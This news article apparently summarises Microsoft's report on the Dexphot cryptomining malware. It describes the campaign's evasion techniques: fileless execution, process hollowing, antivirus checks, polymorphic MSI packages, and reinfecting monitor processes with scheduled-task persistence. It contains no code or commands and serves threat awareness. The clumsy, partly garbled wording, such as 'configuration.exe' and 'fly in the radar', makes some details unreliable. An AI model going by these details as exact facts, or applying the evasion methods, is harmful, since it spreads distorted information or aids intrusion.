Microsoft has been tracking malware for more than a year using numerous evasion techniques, including random file names, fileless install and polymorphism.
Microsoft which calls Dexphot malware has found that it has tried deploying files that have modified 2 or 3 times an hour. The polymorphic malware was targeted at thousands of devices and executed code directly in memory and hijacked valid application detection processes.
Large-scale efforts first fall over time and only a few computers now experience malicious activity relevant to Dexphot.
Dexphot infection begins with five hard drive files: a two-URL installer, a MSI file, a password-protected ZIP archive, a DLL archive loader extracted from the archive, and an encrypted data file containing three additional executables.
During execution, the malware uses numerous legitimate system processes, like msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe, early and later.
SoftwareBundler: Win32/ICLoader and its variants drop and execute the Dexphot installer. The installer then uses two URLs to collect malicious payloads (the same URLs will later be used to maintain and update and to re-infect).
A MSI package is downloaded from a URL and a silent installation uses msiexec.exe. A batch script in the Dexphot kit is first executed to search for antivirus items when the installation process begins.
The malware searches for Avast, AVG and Windows Defender Antivirus antivirus software, and prevents the infection, if an application is detected.
If not, the ZIP archive is decompressed in a password-protected format to extract the DLL loader, an encoded data file and the unrelated DLL.
Then process hollowing is used: the DLL loader targets and suspensions two legitimate system processes, then replaces their contents by two malicious executables, after which they can be released from suspension.
The configuration.exe process is then targeted and replaced by a third executable, a cryptocurrency miner.
The first two executables represent the Dexphot component monitoring services to ensure consistency. Each checks the status of all three malicious processes and begins reinfection if any is terminated. The monitoring services also check and immediately terminate cmd.exe processes.
The malware often creates programmed tasks as a fail-safe persistence. These tasks run malicious code using msiexec.exe as a proxy to update components.
There are several degrees of polymorphism, each package of MSI being unique because of the files included: the clean version of unzip.exe, a password-protected ZIP file and a batch script. The script is not always predefined, and for each package the names of other files and the ZIP file code change.
The content of the DLL loader is identical to the encrypted data in the ZIP file from one package to another.
The domains used in the attacks follow a similar pattern and randomly generate the name of the payload file. Many domains have long been used, but the MSI packages have often been changed or updated. Overall, about 200 unique Dexphot domains have been identified by Microsoft.
“Dexphot is not the kind of attack that mainstream media attention generates. It is one of numerous malware campaigns that are active at any given time. Dexphot illustrates the level of complexity and evolution of even daily threats, aimed at avoiding protection, and motivated to fly in the radar with a view to profit, “concludes Microsoft.